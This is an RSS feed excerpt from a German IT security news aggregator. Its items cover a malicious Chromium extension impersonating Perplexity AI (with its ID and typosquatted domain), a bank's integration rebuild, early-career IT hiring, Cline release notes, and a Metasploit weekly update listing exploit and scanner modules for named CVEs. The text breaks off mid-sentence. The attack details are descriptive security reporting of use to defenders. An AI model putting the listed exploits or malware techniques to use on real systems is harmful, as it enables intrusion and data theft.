<link>https://tsecurity.de/de/3634738/it-security-nachrichten/malicious-chromium-extension-spoofs-perplexity-ai-to-hijack-browser-searches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634738/it-security-nachrichten/malicious-chromium-extension-spoofs-perplexity-ai-to-hijack-browser-searches/</guid>
<pubDate>Tue, 30 Jun 2026 08:37:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A malicious Chromium extension that impersonated the Perplexity AI brand to intercept browser searches and capture keystrokes before delivering users to legitimate search results. The extension, listed as “Search for perplexity ai” (ID flkebkiofojicogddingbdmcmkpbplcd, version 2.2), used Manifest V3 capabilities,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/malicious-chromium-extension-spoofs-perplexity-ai-to-hijack-browser-searches/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/malicious-chromium-extension-spoofs-perplexity-ai-to-hijack-browser-searches/">Malicious Chromium Extension Spoofs Perplexity AI to Hijack Browser Searches</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Chromium Extension Spoofs Perplexity AI to Hijack Browser Searches]]></title>
<description><![CDATA[A malicious Chromium extension that impersonated the Perplexity AI brand to intercept browser searches and capture keystrokes before delivering users to legitimate search results. The extension, listed as “Search for perplexity ai” (ID flkebkiofojicogddingbdmcmkpbplcd, version 2.2), used Manifest...]]></description>
<link>https://tsecurity.de/de/3634616/it-security-nachrichten/malicious-chromium-extension-spoofs-perplexity-ai-to-hijack-browser-searches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634616/it-security-nachrichten/malicious-chromium-extension-spoofs-perplexity-ai-to-hijack-browser-searches/</guid>
<pubDate>Tue, 30 Jun 2026 07:37:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A malicious Chromium extension that impersonated the Perplexity AI brand to intercept browser searches and capture keystrokes before delivering users to legitimate search results. The extension, listed as “Search for perplexity ai” (ID flkebkiofojicogddingbdmcmkpbplcd, version 2.2), used Manifest V3 capabilities, declarativeNetRequest (DNR) rules, and a typosquatted domain perplexity-ai[.]online to create a stealthy two‑hop interception pipeline […]</p>
<p>The post <a href="https://gbhackers.com/chromium-extension-spoofs-perplexity-ai/">Malicious Chromium Extension Spoofs Perplexity AI to Hijack Browser Searches</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I found two EOFY gaming laptop deals worth checking today, whether you want RTX 5060 value or RTX 5090 power]]></title>
<description><![CDATA[Looking for an EOFY gaming laptop deal? These Acer Nitro V and Lenovo Legion Pro 7i discounts cover both lower-cost RTX gaming and high-end desktop-replacement power.]]></description>
<link>https://tsecurity.de/de/3634314/it-nachrichten/i-found-two-eofy-gaming-laptop-deals-worth-checking-today-whether-you-want-rtx-5060-value-or-rtx-5090-power/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634314/it-nachrichten/i-found-two-eofy-gaming-laptop-deals-worth-checking-today-whether-you-want-rtx-5060-value-or-rtx-5090-power/</guid>
<pubDate>Tue, 30 Jun 2026 03:02:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Looking for an EOFY gaming laptop deal? These Acer Nitro V and Lenovo Legion Pro 7i discounts cover both lower-cost RTX gaming and high-end desktop-replacement power.]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Perplexity Chrome Extension Intercepted Searches and Address Bar Input]]></title>
<description><![CDATA[Microsoft has found a malicious Chrome extension that posed as the AI search engine Perplexity and quietly logged what people searched for. It routed every query and every character typed into the address bar through an attacker-controlled server before redirecting…
Read more →
The post Malicious...]]></description>
<link>https://tsecurity.de/de/3633912/it-security-nachrichten/malicious-perplexity-chrome-extension-intercepted-searches-and-address-bar-input/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633912/it-security-nachrichten/malicious-perplexity-chrome-extension-intercepted-searches-and-address-bar-input/</guid>
<pubDate>Mon, 29 Jun 2026 21:38:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft has found a malicious Chrome extension that posed as the AI search engine Perplexity and quietly logged what people searched for. It routed every query and every character typed into the address bar through an attacker-controlled server before redirecting…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/malicious-perplexity-chrome-extension-intercepted-searches-and-address-bar-input/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/malicious-perplexity-chrome-extension-intercepted-searches-and-address-bar-input/">Malicious Perplexity Chrome Extension Intercepted Searches and Address Bar Input</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Perplexity Chrome Extension Intercepted Searches and Address Bar Input]]></title>
<description><![CDATA[Microsoft has found a malicious Chrome extension that posed as the AI search engine Perplexity and quietly logged what people searched for. It routed every query and every character typed into the address bar through an attacker-controlled server before redirecting users to real results.

Microso...]]></description>
<link>https://tsecurity.de/de/3633877/it-security-nachrichten/malicious-perplexity-chrome-extension-intercepted-searches-and-address-bar-input/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633877/it-security-nachrichten/malicious-perplexity-chrome-extension-intercepted-searches-and-address-bar-input/</guid>
<pubDate>Mon, 29 Jun 2026 21:23:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft has found a malicious Chrome extension that posed as the AI search engine Perplexity and quietly logged what people searched for. It routed every query and every character typed into the address bar through an attacker-controlled server before redirecting users to real results.

Microsoft says Google removed it from the store after responsible disclosure. The extension was called "]]></content:encoded>
</item>
<item>
<title><![CDATA[Chromium extension uses AI‑related branding to redirect browser search]]></title>
<description><![CDATA[A malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI redirects browser search traffic using MV3 APIs and intermediary infrastructure.
The post Chromium extension uses AI‑related branding to redirect browser search appeared first on Microsoft Security Blog.]]></description>
<link>https://tsecurity.de/de/3633708/it-security-nachrichten/chromium-extension-uses-airelated-branding-to-redirect-browser-search/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633708/it-security-nachrichten/chromium-extension-uses-airelated-branding-to-redirect-browser-search/</guid>
<pubDate>Mon, 29 Jun 2026 19:53:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI redirects browser search traffic using MV3 APIs and intermediary infrastructure.</p>
<p>The post <a href="https://www.microsoft.com/en-us/security/blog/2026/06/29/chromium-extension-uses-airelated-branding-redirect-browser-search/">Chromium extension uses AI‑related branding to redirect browser search</a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog">Microsoft Security Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chromium extension uses AI‑related branding to redirect browser search]]></title>
<description><![CDATA[A malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI redirects browser search traffic using MV3 APIs and intermediary infrastructure. The post Chromium extension uses AI‑related branding to redirect browser search appeared first on Microsoft Security Blog. T...]]></description>
<link>https://tsecurity.de/de/3633605/it-security-nachrichten/chromium-extension-uses-airelated-branding-to-redirect-browser-search/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633605/it-security-nachrichten/chromium-extension-uses-airelated-branding-to-redirect-browser-search/</guid>
<pubDate>Mon, 29 Jun 2026 19:07:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI redirects browser search traffic using MV3 APIs and intermediary infrastructure. The post Chromium extension uses AI‑related branding to redirect browser search appeared first on Microsoft Security Blog. This…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/chromium-extension-uses-ai-related-branding-to-redirect-browser-search/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/chromium-extension-uses-ai-related-branding-to-redirect-browser-search/">Chromium extension uses AI‑related branding to redirect browser search</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Absa’s giant steps to rebuild its integration foundation]]></title>
<description><![CDATA[With headquarters in Johannesburg, South Africa, Absa also operates in many other African countries, with international offices in Europe and the US. Running an organization across several markets has its unique complexities, especially in the integration layer, because each region has its own sy...]]></description>
<link>https://tsecurity.de/de/3632583/it-security-nachrichten/absas-giant-steps-to-rebuild-its-integration-foundation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632583/it-security-nachrichten/absas-giant-steps-to-rebuild-its-integration-foundation/</guid>
<pubDate>Mon, 29 Jun 2026 12:09:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>With headquarters in Johannesburg, South Africa, Absa also operates in many other African countries, with international offices in Europe and the US. Running an organization across several markets has its unique complexities, especially in the integration layer, because each region has its own systems, business processes, regulatory requirements and data standards.</p>



<p>For Absa, replacing an integration layer that had reached breaking point was a fundamental shift in its banking philosophy. It wasn’t just a technical project. Duplication was rampant, complexity was baked in, and reusability was non-existent. Every change had far-reaching ripple effects, and each new channel had to be built from scratch. As it stood, making the improvements the business demanded at the speed required to remain competitive was impossible.</p>



<p>According to Tamu Dutuma, Absa’s head of technology strategy for Africa Regions, this integration layer had been in place for close to a decade. While it played an important role in enabling business in the past, it was too difficult to maintain and no longer aligned to current standards and ways of working.</p>



<h2 class="wp-block-heading">Integration standardization</h2>



<p>Absa evaluated a range of available solutions in the market, but given the complexity of integrating with legacy systems across a multi-country financial environment, the team decided a more tailored approach was required.</p>



<p>“It was critical to establish the right architecture from the outset, which is why we worked with a strategic partner to build a solution that could better meet our specific integration needs, while also creating a stronger foundation for future scalability,” says Dutuma.</p>



<p>Balancing the long-term benefits of standardization against the immediate complexity of making the shift meant taking time to understand the upstream and downstream impact. The team had to be realistic about how they would standardize banking services, systems, and integrations while keeping disruption to a minimum.</p>



<p>As part of this process, Absa aligned with globally recognized standards, including BIAN, which provides a common framework for designing and integrating banking systems. The goal is to give banks a blueprint to successfully modernize complicated legacy architectures by defining standardized business capabilities, service domains, APIs, and data models.</p>



<p>The new integration layer provided three critical things for the business: decoupling and abstraction, standardization, and strategic orchestration. This meant separating customer-facing channels from core banking and backend services, using BIAN frameworks to enforce strict governance, and orchestrating only where necessary to keep the architecture lean.</p>



<h2 class="wp-block-heading">Choosing the right implementation strategy</h2>



<p>With this plan in mind, the bank needed to decide how to execute it. “We took a phased approach to the rollout, starting with a specific use case, our chatbot Chat Banking in our Africa Regions business,” says Dutuma. “This allowed us to build and test the new integration layer in a controlled, practical way. From there, we introduced an architecture principle that all new initiatives would integrate through this platform, while only time-critical projects continued to rely on the legacy environment.” The goal was to set a North Star project, which allowed them to quickly demonstrate value.</p>



<p>But this wasn’t a copy-paste exercise, and everything didn’t fit perfectly from the start. The bank admits that managing legacy outliers remains one of the biggest challenges on this modernization journey. Data mapping was another challenge. To ensure data moved correctly and quickly from one system to another, Absa had to build a data mapping framework to automate parts of the process.</p>



<p>As the project progressed and the team ironed out these kinks, they gradually migrated existing services to the new layer. “This wasn’t a like-for-like replacement,” he says. “We were also simplifying and standardizing the architecture, which required careful mapping, redesign, and end-to-end testing across both channels and core systems.”</p>



<h2 class="wp-block-heading">Banking on the future</h2>



<p>For Dutuma, this multi-year journey has allowed Absa to incrementally modernize the environment while continuing to support ongoing business delivery. And the project has delivered several strategic wins, from a drastic reduction in time-to-market to an equally dramatic reduction in costs. Standardization also opened additional opportunities for innovation across the business. For example, using a standardized API catalog enables plug-and-play integration capabilities, which means developers aren’t reinventing the wheel for every project. Where there used to be 20 disparate payment services, for instance, because everything is standardized, there are now four, which markedly reduces maintenance costs.</p>



<p> “This also provides a stronger foundation for Absa Group’s open banking initiatives, enabling selected services to be securely exposed for integration with FinTech partners and other ecosystem players,” he says. Plus, integrating new channels has become more straightforward, as teams can now leverage consistent, reusable integration patterns. This makes it easier to scale digital capabilities and accelerate delivering new customer-facing solutions.</p>



<p>This project, according to Dutuma, wasn’t just about fixing the old tech, but enabling cloud readiness and creating a leaner, modular application stack that can be used across other markets. Now, Absa doesn’t need to build a unique integration for a wallet in Botswana or for internet banking in Tanzania. There’s a common middleware layer across all regions, allowing countries to independently replace or upgrade core applications without affecting the broader regional footprint. In this way, Absa has essentially dissociated geography from technology to reduce complexity, improve interoperability, and ensure that different systems all speak the same language.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to keep your IT talent pipeline from collapsing]]></title>
<description><![CDATA[The transformative lure of AI is rapidly pushing IT leaders’ talent pipelines toward more of a crossroads than many may fully want to admit.



The traditional approach of growing IT expertise in-house from entry-level positions is being challenged by a combination of skills-demand shifts toward ...]]></description>
<link>https://tsecurity.de/de/3632581/it-security-nachrichten/how-to-keep-your-it-talent-pipeline-from-collapsing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632581/it-security-nachrichten/how-to-keep-your-it-talent-pipeline-from-collapsing/</guid>
<pubDate>Mon, 29 Jun 2026 12:09:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The transformative lure of AI is rapidly pushing IT leaders’ talent pipelines toward more of a crossroads than many may fully want to admit.</p>



<p>The traditional approach of growing IT expertise in-house from entry-level positions is being challenged by a combination of skills-demand shifts toward AI experience and the replacement of entry-level roles in favor of AI automation.</p>



<p>Employment among early-career workers, ages 22 to 25, in the most AI-exposed occupations has fallen 16% since the introduction of ChatGPT in late 2022, according to a widely cited <a href="https://digitaleconomy.stanford.edu/publication/canaries-in-the-coal-mine-six-facts-about-the-recent-employment-effects-of-artificial-intelligence/" rel="nofollow">study from Stanford’s Digital Economy Lab</a>. For entry-level software developers, the drop was nearly 20%. As the pool of talent with early-career IT pros with hands-on experience shrinks, IT leaders are likely to face stiffer challenges filling more vital midlevel roles down the road.</p>



<p>Looking forward, some IT leaders believe replacing junior engineers and other entry-level IT roles with AI to cut costs will eventually backfire, leaving companies short of experienced staff who can tackle difficult problems and design scalable solutions.<br><br></p>



<p>According to a recent <a href="https://www.gartner.com/en/newsroom/press-releases/2026-05-05-gartner-says-autonomous-business-and-artificial-intelligence-layoffs-may-create-budget-room-but-do-not-deliver-returns" rel="nofollow">Gartner survey of global business executives</a>, organizations that automated aspects of their businesses and reduced their workforces aren’t seeing returns from those supposed efficiencies. What has improved the bottom line? Investing in new roles, upskilling, and systems that amplify the capabilities of staff so they can supervise and grow autonomous work.</p>



<p>Moreover, the Gartner report forecasts that autonomous business practices will require more staff, not less, over the next two to three years, leading to a net positive in job growth as people are hired to manage those efforts.</p>



<p>Yet, in the short term, investors are rewarding companies that make AI-related workforce reductions. And many executives are pushing for the same. So how are CIOs and other leaders planning to build the necessary skills for future success by creating a pathway for middle- and senior-level IT talent?</p>



<h2 class="wp-block-heading">‘Early in context’</h2>



<p>In response to this downward trend in early career hiring, Microsoft’s Mark Russinovich and Scott Hanselman penned an <a href="https://dl.acm.org/doi/10.1145/3779312">article</a> that pushes back on this trend. They propose bringing in early-career programming talent and pairing them with experienced mentors on product teams, where they can help new hires identify — and solve — real-world problems that AI might miss.</p>



<p>In the article, the Microsoft execs noted that experienced programmers found dozens of problems in AI-generated code that appeared to work correctly. They also pointed to the risk of “cognitive debt,” citing MIT research that found reduced brain activity among people relying heavily on AI for writing tasks.</p>



<p>“While agents can speed up workflows and reduce manual effort, they lack the intuition to anticipate edge cases and build robust solutions,” the authors wrote. “Relying too much on AI risks missing subtle bugs, architectural flaws, and vulnerabilities that only skilled engineers can catch. Human oversight, critical thinking, and domain knowledge are indispensable for both correcting errors and driving innovation as technology progresses.”</p>



<p>Hanselman, vice president and member of technical staff at Microsoft, argues that software development isn’t simply a matter of writing code. Senior engineers, he notes, have experience in what works, what fails, what can break in production, and what elegant design looks like — and how to scale it. AI can increase output, but it does not help a new developer learn this sort of judgment.</p>



<p>“When you say early in career, it’s actually early in context — junior devs are missing context,” he says. “The way that we develop good taste is through failing in a safe place. And right now, companies hire juniors, throw them at a problem, chew them up and spit them out — and that’s the wrong way to do it.”</p>



<h2 class="wp-block-heading">A new mentorship model</h2>



<p>Hanselman suggests, instead of slashing roles for junior programmers, companies should be creating systems that help them develop the skills necessary to become valued senior contributors in the future.</p>



<p>He proposes adopting a mentorship approach called a “preceptorship,” borrowed from the medical field, where senior engineers are explicitly responsible for helping juniors gain experience and develop good judgment. Hanselman’s wife is a nurse and preceptor, and her experience helped spur the idea.</p>



<p>“The preceptorship acknowledges that a nurse has passed the board,” he explains. “They’ve joined the company. It’s their first day on the job. They are qualified to be there. They are supposed to be there — but they’re missing context.”</p>



<p>Technology companies need a similar model, he argues, where programmers are allowed to learn, not just produce, from experienced mentors: “We need high communicators, with high agency — kind individuals who will invest in the future.”</p>



<p>He contrasts this practical, real-world mentoring approach with a coding boot camp.</p>



<p>“What do people do in boot camps? They wash out,” he says. “You couldn’t hack it. A preceptorship is a relationship between a senior engineer, who has your best interest at heart and is going to help you become a better AI-augmented software engineer — not a vibe coder. We’re not vibing into production. We are using the powerful tools that have been developed to create high-quality software with good taste and with good discernment at scale.”</p>



<h2 class="wp-block-heading"><a></a>A talent gap in the making</h2>



<p>Companies that eliminate junior roles because AI can do some entry-level tasks may see improved short-term output while weakening their future technical capabilities. Tech executives say a lack of investment in early career hiring will show up in the future as a dearth of leadership and institutional knowledge, as well as a reduction in product quality and the ability to effectively manage and oversee code or other work created with AI.</p>



<p>“Senior engineers are built through exposure to real systems, not just writing code,” says Craig Miller, former CIO of fast-food chain Sonic, now a consultant, board advisor, and author. “They need to understand how things scale, how they break, and how decisions impact the business. That experience cannot be automated.”</p>



<p>Reducing junior developer roles should be seen as a long-term capability risk instead of a budget efficiency, says Macaire Montini, vice president of people and culture at cloud-based HR software company HiBob.</p>



<p>“The decline in junior developer roles isn’t just an employment trend,” Montini says. “It’s a long-term pipeline problem that technology leaders should treat with the same urgency as any infrastructure risk. If you stop bringing in early-career talent, you don’t just have a gap today — you have a leadership drought in five years.”</p>



<p>Zsolt Kerecsen, CTO at Graphisoft, argues that replacing early-career staff with AI hurts staff growth and undercuts an organization’s ability to manage autonomous capabilities. CIOs should treat early-career hiring as an investment in future delivery quality, system oversight, and AI governance, he says.</p>



<p>“Experienced developers are needed to train AI and validate its outputs,” he says. “That’s why trying to substitute juniors with AI is a fundamentally flawed approach. Instead, AI should be used — guided by seniors — to support junior developers and help them become seniors more quickly.”</p>



<p>Miller says the reduction in early career hiring is just one sign of a broader issue of “slow decay,” where current tech staff aren’t training their replacements. He points to other indications of a future talent crisis: “Decline in CS enrollments as prospective students respond to deteriorating job market signals, which could produce a senior engineer shortage in 5 to 10 years even as AI reduces demand for entry-level workers today. The real risk is not that AI will eliminate the need for developers. It’s that companies will eliminate the early learning ground that has always produced great ones.”</p>



<h2 class="wp-block-heading">Filling the pipeline</h2>



<p>With early-career roles evolving quickly, experts advise CIOs to take a more intentional approach to hiring and training IT talent, programmers in particular — one that uses AI to help junior staff become better, faster, instead of replacing them.</p>



<p>AI may enable junior developers to take on more advanced tasks earlier, Montini says, but they still need mentoring and structured guidance to become experienced contributors.</p>



<p>“We believe the answer isn’t just hiring,” Montini says. “It’s how you onboard and develop early-career talent once they’re through the door. Structured training, clear skill development pathways, and meaningful mentorship are what actually close the gap between potential and performance. Without that scaffolding, junior hires churn before they become the midlevel talent you need.”</p>



<p>Paul DeMott, CTO at Helium SEO, says organizations should rethink talent development from a new hire’s first day.</p>



<p>“Before a junior developer on our team writes a single line of code on any new feature, they have to propose the full architecture for it, present it in a 15-minute review with the senior team, and explain every tradeoff they considered,” he says. “The junior does not implement anything until they defend those decisions. This process forces systems thinking before syntax thinking, which is exactly what separates a developer who grows into senior roles from one who stays at the execution layer indefinitely.”</p>



<p>In the past year and a half, DeMott says, that process has helped junior hires rise more quickly through the ranks, with two junior developers promoted to midlevel roles.</p>



<p>Kerecsen says his company actively seeks out junior talent at the university level, works with them for several years, then brings them on as junior or potentially midlevel engineers.</p>



<p>“There is a concerning misunderstanding about AI’s potential, especially regarding its ability to replace junior developers,” Kerecsen says. “It is actually disastrous for delivery quality and long-term sustainability. Junior developers are an investment in our future.”</p>



<p>Liz Eversoll, CEO of upskilling and recruitment company Career Highways, says organizations should move from informal apprenticeship to a more intentional model for skills-based growth.</p>



<p>“The next generation of senior programmers will be developed differently,” Eversoll says. “Junior engineers can now contribute to higher-complexity work earlier by using AI as a copilot, but that only works if organizations provide pathways that connect real work, learning, and continuous assessment.”</p>



<h2 class="wp-block-heading"><a></a>Building judgment, not just output</h2>



<p>The goal is to help junior developers gain the kind of experience that allows them to understand systems, weigh tradeoffs, and eventually guide technical decisions.</p>



<p>Former Sonic CIO Miller says that kind of experience cannot be automated.</p>



<p>“The organizations that get this right will balance AI-driven efficiency with structured mentorship and real-world exposure, treating talent development as a long-term priority,” Miller says. “The next generation of senior engineers will not emerge accidentally. They will have to be built through structured apprenticeship, guided use of AI, real exposure to production environments, and deliberate development of judgment, architecture thinking, debugging discipline, and business context.”</p>



<p>Rema Lolas, founder of team-building platform Groziac, says AI may make technical skills more accessible, but it will also put more pressure on how people work together.</p>



<p>“AI may level the technical playing field, but it will amplify the differences in human performance,” Lolas says. “The organizations that recognize this early will stop treating development as a training problem, and start treating it as a system design challenge — where people are intentionally developed not just in skill, but in how they operate and perform together.”</p>



<p>Microsoft’s Hanselman says the skills that matter most today are not just AI prompt fluency or the ability to generate code quickly, but systems thinking and communication.</p>



<p>“So for the young person who’s coming into this, you can’t have blinders on,” he says. “Making large, interesting systems that help people and make their lives better — that is not being commoditized. You need big-picture thinking, taste, discernment, good judgment, good communication skills, and a rock-solid understanding of the basics. Just because I’m riding around in an Uber doesn’t mean that I don’t know how to change a tire.”</p>



<p>Tech leaders say organizations need to make early-career growth a core part of engineering work. That means giving junior staff real programming work, in-the-moment senior guidance and AI support that accelerates learning without replacing it.</p>



<p>“Ultimately, developing senior talent is no longer a byproduct of hiring, it’s the result of deliberate infrastructure,” Eversoll says. “Organizations that invest in skills-based progression systems will not only sustain their pipeline, but accelerate it.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.0.2]]></title>
<description><![CDATA[Added

Add reasoning effort support (including xhigh) for DeepSeek thinking models.
Improve the ClinePass provider experience with clearer reasoning controls and model selection.

Fixed

Show reasoning effort controls for ClinePass models and align ClinePass model resolution with the rest of the ...]]></description>
<link>https://tsecurity.de/de/3631899/downloads/v402/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631899/downloads/v402/</guid>
<pubDate>Mon, 29 Jun 2026 06:16:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Added</h3>
<ul>
<li>Add reasoning effort support (including <code>xhigh</code>) for DeepSeek thinking models.</li>
<li>Improve the ClinePass provider experience with clearer reasoning controls and model selection.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Show reasoning effort controls for ClinePass models and align ClinePass model resolution with the rest of the provider.</li>
<li>Prefer canonical Cline Z.ai model ids and polish ClinePass and Z.ai model metadata.</li>
<li>Fix environment variable replacement in the webview.</li>
<li>Default focus chain settings in webview state so the toggle reflects the correct value on load.</li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/cline/cline/compare/v4.0.1...v4.0.2"><tt>v4.0.1...v4.0.2</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: Modules for Audiobookshelf, LiteLLM, Next.js, Dalfox and more]]></title>
<description><![CDATA[Help shape the future of Metasploit FrameworkWe are planning future work in relation to the evasion capabilities present in Metasploit Framework, and how they function/are presented to users. We are currently accepting responses to our feedback form, which means that you can shape the future of h...]]></description>
<link>https://tsecurity.de/de/3628469/it-security-nachrichten/weekly-metasploit-update-modules-for-audiobookshelf-litellm-nextjs-dalfox-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628469/it-security-nachrichten/weekly-metasploit-update-modules-for-audiobookshelf-litellm-nextjs-dalfox-and-more/</guid>
<pubDate>Fri, 26 Jun 2026 21:53:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Help shape the future of Metasploit Framework</h2><p>We are planning future work in relation to the evasion capabilities present in Metasploit Framework, and how they function/are presented to users. We are currently accepting responses to our feedback form, which means that you can shape the future of how evasive capabilities are implemented in Metasploit Framework. The proposal for the changes can be found <a href="https://gist.github.com/smcintyre-r7/09488f45904d73ff0ce0d5a7f7e5a830">here</a>, and you can submit your responses to the form <a href="https://docs.google.com/forms/d/e/1FAIpQLSfa1JVJzqrQ2lh9a0peW8VGs3pNSb47vw5RJWVicfiQU5bpDg/viewform?usp=publish-editor">here</a>. The form will stop accepting responses on the 1st of July, 2026.</p><p>New module content and improvements have also been added this week. This includes a Next.js Middleware Authorization Bypass scanner, LiteLLM Proxy SQL Injection, an unauthenticated API authentication bypass scanner for Audiobookshelf, a deserialization RCE in Dalfox, and improvements to service and host reporting in bruteforce-related modules.</p><h2>New module content (4)</h2><h3>Audiobookshelf Unauthenticated API Authentication Bypass Scanner</h3><p>Authors: Kenneth LaCroix and swiftbird07</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21565">#21565</a> contributed by <a href="https://github.com/kenlacroix">kenlacroix</a></p><p>Path: scanner/http/audiobookshelf_auth_bypass</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-25205&amp;referrer=blog">CVE-2025-25205</a></p><p>Description: Adds audiobookshelf_auth_bypass, a detection module for CVE-2025-25205 — an unauthenticated API authentication bypass in Audiobookshelf (self-hosted audiobook/podcast server), affecting versions 2.17.0 – 2.19.0 (fixed in 2.19.1).</p><h3>BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner</h3><p>Authors: Kenneth LaCroix and Tencent YunDing Security Lab</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21567">#21567</a> contributed by <a href="https://github.com/kenlacroix">kenlacroix</a></p><p>Path: scanner/http/litellm_proxy_sqli</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-42208&amp;referrer=blog">CVE-2026-42208</a></p><p>Description: Adds auxiliary/scanner/http/litellm_proxy_sqli, a detection module for CVE-2026-42208 (CVSS 9.3, on the CISA KEV list) — a pre-authentication SQL injection in BerriAI LiteLLM proxy.</p><h3>Next.js Middleware Authorization Bypass Scanner</h3><p>Authors: Kenneth LaCroix, Rachid Allam, and Yasser Allam</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21566">#21566</a> contributed by <a href="https://github.com/kenlacroix">kenlacroix</a></p><p>Path: scanner/http/nextjs_middleware_auth_bypass</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-29927&amp;referrer=blog">CVE-2025-29927</a></p><p>Description: Adds nextjs_middleware_auth_bypass, a detection module for CVE-2025-29927 (CVSS 9.1) — an authorization bypass in self-hosted Next.js applications.</p><h3>Dalfox Found-Action Deserialization RCE</h3><p>Authors: Emmanuel David and Takahiro Yokoyama</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21493">#21493</a> contributed by <a href="https://github.com/Takahiro-Yoko">Takahiro-Yoko</a></p><p>Path: linux/http/dalfox_server_rce_cve_2026_45087</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-45087&amp;referrer=blog">CVE-2026-45087</a></p><p>Description: This adds an exploit module for Dalfox Server versions &lt;= 2.12.0 which are vulnerable to an unauthenticated RCE tracked as CVE-2026-45087. The vulnerability allows attackers to send arbitrary commands via found-action post parameter which gets deserialized and run in the context of the user running the server.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21396">#21396</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This makes improvements to the auth_brute mixin. It adds report_host and report_service calls to the mixin and removes duplicate printing of IP:PORT in the print_brute statements.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21562">#21562</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updated the usage of rex-socket's recvfrom method to align with the standard library implementation. This also allows rex-socket to now be used as a drop-in replacement for Ruby's UDPSocket.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with 